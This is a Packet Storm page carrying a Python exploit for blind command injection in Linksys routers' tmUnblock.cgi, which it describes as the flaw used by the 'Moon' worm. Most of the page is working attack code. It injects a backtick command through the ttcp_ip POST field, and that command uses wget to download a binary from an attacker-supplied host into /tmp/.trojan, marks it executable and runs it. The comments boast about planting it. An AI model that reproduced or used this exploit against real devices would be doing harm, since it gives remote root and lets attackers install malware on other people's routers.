Proof of concept exploit used by the recent Linksys worm (known as "Moon"). Exploits blind command injection in tmUnblock.cgi.
ae7d5127e7b3b8fa46d888c48b1a569122f9a4eb074e9be265ffb8853f9989d3#!/usr/bin/python2
"""
Linksys Remote Root Exploit
infodox - insecurety research
This is the exploit this "Moon" worm uses.
Trivial blind cmd injection :)
This version crippled - uses wget.
Twitter: @info_dox
Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
"""
import requests
import sys
def banner():
print """\x1b[0;32m
.____ .__ __
| | |__| ____ | | __ _________.__. ______
| | | |/ \| |/ / / ___< | |/ ___/
| |___| | | \ < \___ \ \___ |\___ \
|_______ \__|___| /__|_ \/____ >/ ____/____ >
\/ \/ \/ \/ \/ \/
You are the weakest link. Goodbye.
Linksys remote root - infodox - Insecurety Research.
Version 2: Crippled (wget shelldrop only)
\x1b[0m"""
def upShell(wget_url, target):
""" This works with the normal busybox wget at least, and worked in testing"""
cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url)
print "{+} Planting Bomb!"
execute_command(target=target, command=cmd)
print "{!} TERRORISTS WIN!"
def execute_command(target, command):
url = target + "/tmUnblock.cgi"
injection = "-h `%s`" %(command)
# this is a very sexy POST request. TOTALLY LEGIT.
the_ownage = {'submit_button': '',
'change_action': '',
'action': '',
'commit': '0',
'ttcp_num': '2',
'ttcp_size': '2',
'ttcp_ip': injection,
'StartEPI': '1'}
headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
# it is truly mad hax.
mad_hax = requests.post(url=url, data=the_ownage, headers=headers)
def main(args):
banner()
if len(sys.argv) != 3:
sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0]))
upShell(wget_url=sys.argv[2], target=sys.argv[1])
if __name__ == "__main__":
main(sys.argv)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed